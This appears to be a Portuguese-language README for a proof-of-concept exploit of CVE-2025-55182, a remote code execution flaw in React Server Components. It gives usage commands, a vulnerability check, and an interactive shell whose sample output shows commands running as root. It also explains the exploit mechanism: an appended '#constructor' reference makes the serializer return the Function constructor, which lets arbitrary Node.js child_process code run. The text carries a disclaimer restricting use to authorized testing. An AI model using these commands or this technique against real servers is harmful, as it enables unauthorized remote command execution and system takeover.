
Poc para CVE-2025-55182
PoC para CVE-2025-55182
Usage: python3 poc.py -u http://target.com --cmd "<cmd_here>"
Esta ferramenta é fornecida apenas para fins educacionais e testes de segurança autorizados. O uso desta ferramenta para atacar alvos sem consentimento prévio mútuo é ilegal. O desenvolvedor não assume nenhuma responsabilidade e não se responsabiliza por qualquer uso indevido ou danos causados por este programa.
pip install requests
Você pode executar a ferramenta em três modos: Check (Verificação), Exploit (Exploração) ou Shell Interativo.
usage: poc.py [-h] [-u URL] [--id ID] [-c CMD] [--check]
options:
-h, --help show this help message and exit
-u URL Target URL (e.g., http://localhost:3000)
--id ID Target Server Action ID (default: user-profile-action)
-c CMD, --cmd CMD Command to execute directly (non-interactive mode)
--check Only check for vulnerability (Crash Method), do not exploit
python3 poc.py -u http://target-site.com --check
python3 poc.py -u http://target-site.com --cmd "id"
python3 poc.py
# Inside the shell
RSC-Shell> set url http://localhost:3000
[+] URL set to: http://localhost:3000
RSC-Shell> check
[+] TARGET IS VULNERABLE!
RSC-Shell> shell
[*] Starting pseudo-interactive shell. Use 'exit' to return.
cmd> whoami
root
A Verificação: Envia uma requisição multipart definindo {} no índice 1, e tenta acessar ["$1:a:a"]. Servidores não corrigidos travam (HTTP 500) ao tentar acessar a propriedade a de undefined. Servidores corrigidos retornam HTTP 200.
A Exploração: Envia uma requisição multipart referenciando o Action ID válido, mas acrescenta #constructor. Isso engana o serializador, fazendo-o retornar o construtor Function, permitindo que passemos JavaScript arbitrário (Node.js child_process) para ser executado no servidor.